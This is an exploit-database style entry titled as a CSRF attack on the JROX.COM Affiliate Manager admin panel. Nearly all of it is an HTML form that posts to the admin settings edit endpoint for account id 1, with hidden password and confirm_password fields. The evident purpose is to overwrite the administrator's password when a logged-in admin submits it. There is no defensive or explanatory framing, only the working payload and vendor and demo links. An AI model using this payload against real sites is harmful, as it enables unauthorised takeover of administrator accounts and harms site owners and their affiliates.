# Exploit Title: JROX.COM Affiliate Manager CBFront CSRF # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/jroxcom-affiliate-manager/20262/ # Category:: webapps # Demo : http://www.jroxdemo.com/jamdemo162/admin/index.php <form id="form1" name="form1" method="post" action="target.com/[PATH]/admin/main.php?mod=settings&req=admin&action=edit&aid=1" style="display:inline;" onsubmit="return CheckData();"> <input type="submit" class="select_small_1" value="Change" name="Submit"/> <input type="hidden" style="display: inline;" id="password" maxlength="30" size="30" name="password"/> <input type="hidden" style="display: inline;" id="confirm_password" maxlength="30" size="30" name="confirm_password"/> </form>